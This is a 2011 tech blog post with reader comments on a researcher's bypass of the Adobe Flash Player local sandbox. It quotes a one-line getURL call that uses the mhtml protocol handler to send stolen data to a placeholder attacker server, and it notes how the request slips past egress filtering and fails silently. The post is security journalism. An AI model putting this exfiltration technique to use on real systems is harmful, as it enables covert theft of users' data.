Adobe's Flash Sandbox Not So Secure After All

Martin Brinkmann
Jan 15, 2011
Updated • Dec 3, 2012
Security
|
4

The idea on paper sounded great: Add a sandbox to Adobe Flash to prevent many attacks from affecting the underlying operating system. It appears however that the sandbox which has been introduced in December 2010 is not as effective as it could be. Security researcher Billy Rios discovered a way to bypass Adobe's Flash Player sandbox locally.

He found out that SWFs that are loaded from a local file can in fact bypass the sandbox by passing "the contents to the attacker server via getURL() and a url like: file://..". That however can only be used to pass IPs and hostnames and no other data.

Data can however be send to a remote server on the Internet as well. A solution was quickly discovered; Adobe is blacklisting protocol handlers (via) which means that Flash Player will block some protocols (like JavaScript://) while allowing others (like mailto://). While it is theoretically possible to bypass the blacklist, an even easier solution is to find a protocol that is currently not included in the list.

Billy Rios found the mhtml protocol:

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);

Some other benefits for using the mhtml protocol handler are:

The request goes over http/https and port 80/443 so it will get past most egress filtering
If the request results in a 404, it will silently fail. The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer
The protocol handler is available by default on Win7 and will launch with no protocol handler warning

Attackers need to create a Flash file that they add the mhtml request to. Users then would need to execute the file on their computer system. How does it get there? For instance by email or as part of a virus attack. (via)

Advertisement

Previous Post: «
Next Post: «

Comments

  1. Nicolai said on January 18, 2011 at 11:02 pm
    Reply

    So far, there hasn’t been any “real” exploits. This attack needs *a lot* of social engineering (SE) to work.

    “How does it get there? For instance by email or as part of a virus attack.” – Well, by default lots of computers don’t open flash files probably (ie with IE), so the user needs to drag’n’drop the file into IE to get his/her information stolen. And why should a virus use a flash file to steal info? It can just send the data itself (=easier and more “safe”).

  2. BobbyPhoenix said on January 15, 2011 at 11:55 pm
    Reply

    Does this apply to the sandboxing in Chrome, or just Flash in general on all browsers?

    1. Martin said on January 16, 2011 at 3:05 am
      Reply

      This applies to the general Flash installation.

Leave a Reply

Check the box to consent to your data being stored in line with the guidelines set out in our privacy policy

We love comments and welcome thoughtful and civilized discussion. Rudeness and personal attacks will not be tolerated. Please stay on-topic.
Please note that your comment may not appear immediately after you post it.